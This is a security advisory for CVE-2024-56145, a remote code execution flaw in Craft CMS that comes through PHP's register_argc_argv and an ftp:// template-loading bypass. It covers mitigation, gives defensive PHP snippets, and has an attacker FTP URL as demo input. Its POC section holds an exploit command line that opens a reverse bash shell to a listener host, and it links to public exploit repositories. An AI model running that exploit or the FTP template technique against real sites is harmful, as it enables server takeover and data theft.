Craft CMS Remote Code Execution : CVE-2024-56145

Vulnerable Version

Versions >= 3.0.0 and < 3.9.14
Versions >= 4.0.0-RC1 and < 4.13.2
Versions >= 5.0.0-RC1 and < 5.5.2

Fixed Version

Patched versions 3.9.14, 4.13.2, or 5.5.2

Base Score

9.3 Critical

Vendor Description:-

Craft CMS (Content Management System) is a flexible and user-friendly platform for building and
managing websites. It is known for its developer-centric approach, providing powerful tools for
developers to create custom websites and applications while still being easy for content editors to use.

CVE-2024-56145 Vulnerability Description:-

Security experts at Assetnote discovered a severe vulnerability (CVE-2024-56145) in Craft CMS, a popular
PHP-based content management system. This issue, with a CVSS score of 9.3, allows unauthenticated
remote code execution (RCE) in some settings, posing a serious danger to vulnerable installations.
This vulnerability abuses the behavior of the register_argc_argv configuration directive in PHP. When it is
enabled, the query string of a web request populates the $_SERVER['argv'] array, mimicking command-line
input. While this behavior can be useful in certain scenarios, it inadvertently exposes the system to
attack by allowing malicious actors to pass, over the web, options that were only ever intended for the
command-line environment.
As noted by Assetnote, “Critically, the Craft CMS official Docker has register_argc_argv = On. This sets the
stage for our bug.”
The issue is located in the bootstrap/bootstrap.php file of Craft CMS, where command-line options are
processed without first checking whether the code is being executed in a CLI context. This oversight allows
attackers to manipulate paths, such as --templatesPath or --configPath, forcing the CMS to load arbitrary
files.
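The option-handling mistake described above, as an added illustration that is not Craft's own bootstrap/bootstrap.php code: a function that trusts $_SERVER['argv'] under any SAPI, beside a hardened version that only honours options under the CLI SAPI and refuses path values that are stream wrappers rather than local directories. The option names --templatesPath and --configPath come from the advisory; the function names, the option regex and the sample argv are assumptions made for this example.

```php
<?php
// Added illustration, not Craft CMS code. Option names match the advisory;
// everything else here is assumed for the example.

/**
 * UNSAFE: reads long options from argv no matter which SAPI is running.
 * With register_argc_argv=On, a web request whose query string is
 * "--templatesPath=..." populates $_SERVER['argv'] exactly like a command
 * line, so the "CLI" options become attacker-controlled.
 */
function parseOptionsUnsafe(array $argv): array
{
    $options = [];
    foreach ($argv as $arg) {
        if (preg_match('/^--(\w+)=(.*)$/', $arg, $m)) {
            $options[$m[1]] = $m[2];
        }
    }
    return $options;
}

/**
 * HARDENED: options are honoured only under the CLI SAPI, and any path option
 * must resolve to a real local directory. file_exists() alone is not enough,
 * because it also answers for some stream wrappers (the advisory notes ftp://),
 * so anything with a scheme prefix is rejected before the filesystem is asked.
 */
function parseOptionsSafe(array $argv, string $sapi = PHP_SAPI): array
{
    if ($sapi !== 'cli') {
        return [];              // web request: argv is never consulted
    }
    $options = [];
    foreach ($argv as $arg) {
        if (!preg_match('/^--(\w+)=(.*)$/', $arg, $m)) {
            continue;
        }
        [$name, $value] = [$m[1], $m[2]];
        if (in_array($name, ['templatesPath', 'configPath'], true)) {
            $value = validateLocalDir($value);
            if ($value === null) {
                continue;       // drop the option instead of loading an arbitrary source
            }
        }
        $options[$name] = $value;
    }
    return $options;
}

/** Canonical path if $path is an existing local directory, otherwise null. */
function validateLocalDir(string $path): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return null;            // ftp://, php://, http://, ... are not local paths
    }
    $real = realpath($path);
    return ($real !== false && is_dir($real)) ? $real : null;
}

// Constructed demo input: what a web request carrying the query string
// "--templatesPath=ftp://attacker.example/templates" puts into $_SERVER['argv']
// when register_argc_argv is On.
$webArgv = ['--templatesPath=ftp://attacker.example/templates'];
var_dump(parseOptionsUnsafe($webArgv));            // option honoured: the bug
var_dump(parseOptionsSafe($webArgv, 'fpm-fcgi'));  // []: web SAPI, argv ignored
var_dump(parseOptionsSafe($webArgv, 'cli'));       // []: wrapper path rejected
```

The two checks are deliberately independent: the SAPI check closes the web-facing entry point, while the local-directory check protects the genuine CLI use case from being pointed at a remote or wrapper-backed source.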
Exploiting this vulnerability for Remote Code Execution (RCE) required bypassing Craft CMS’s defensive
mechanisms, such as file existence checks (file_exists), which block common file inclusion methods like
php://filter or HTTP wrappers. Researchers found that using the ftp:// wrapper bypasses these checks,
allowing the CMS to load template files from a malicious FTP server.
By hosting crafted Twig template files on a controlled FTP server, attackers injected executable payloads
into Craft CMS. One inventive method used the Twig sort filter to bypass Craft’s built-in sandboxing,
enabling the execution of system commands. An example payload to achieve this would be:

Impact and Potential Risks

  1. Remote Code Execution (RCE): Attackers can execute arbitrary code on the server, potentially
    leading to unauthorized access and control over the system.
  2. Data Breaches: Exploitation may result in unauthorized access to sensitive data, including user
    information and proprietary content.
  3. Operational Disruption: Successful attacks can disrupt website functionality, leading to
    downtime and reputational damage.

Mitigation

Update Craft CMS: The recommended course of action is to update to the latest patched versions of
Craft CMS, specifically 3.9.14, 4.13.2, or 5.5.2. This update addresses the vulnerability and removes the
risk of exploitation due to the register_argc_argv configuration.
Disable register_argc_argv: If updating is not immediately possible, a temporary mitigation involves
disabling the register_argc_argv directive in the php.ini file. This can be achieved by setting
register_argc_argv = Off and restarting the web server to apply changes.
Those managing numerous Craft CMS deployments should conduct regular audits of the server’s PHP
settings to guarantee compliance with security best practices.
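An added verification check for the second mitigation, written for this page and not part of the advisory or of Craft CMS. It is meant to be requested once through the web server (then deleted), because under the CLI SAPI PHP forces register_argc_argv on regardless of php.ini, so `php -r 'echo ini_get("register_argc_argv");'` always reports the directive as enabled and says nothing about the web configuration. The function name and the report format are assumptions.

```php
<?php
// Added verification script, not Craft CMS code. Request it via the web SAPI
// (php-fpm, mod_php, ...); a CLI run always reports the directive as on.

function argvExposure(): array
{
    // ini_get() returns the normalized ini value ("1" for On, "" for Off).
    $on = filter_var(ini_get('register_argc_argv'), FILTER_VALIDATE_BOOLEAN);
    return [
        'sapi'                  => PHP_SAPI,
        'register_argc_argv_on' => $on,
        // Once the directive is Off, a web request should not carry argv at all.
        'argv_present'          => isset($_SERVER['argv']),
        // The exposure the advisory describes only exists outside the CLI SAPI.
        'exposed'               => PHP_SAPI !== 'cli' && $on,
    ];
}

$report = argvExposure();
header('Content-Type: text/plain');
echo json_encode($report, JSON_PRETTY_PRINT), "\n";
// Non-zero exit makes the result easy to consume from a fleet audit loop.
exit($report['exposed'] ? 1 : 0);
```

After setting register_argc_argv = Off and restarting the web server or PHP-FPM, "exposed" should read false and "argv_present" false; if "sapi" reads "cli", the script was not run through the web SAPI and the result is meaningless for this check. Because the php.ini loaded by PHP-FPM or mod_php can differ from the one the CLI loads, the directive must be set in the web SAPI's configuration (for a Docker deployment, typically a drop-in file in that SAPI's conf.d directory).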

POC

Exploit link – Clickme

python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

References:-

https://securityonline.info/cve-2024-56145-remote-code-execution-vulnerability-in-craft-cms-poc-published/
https://github.com/Sachinart/CVE-2024-56145-craftcms-rce
https://github.com/Chocapikk/CVE-2024-56145
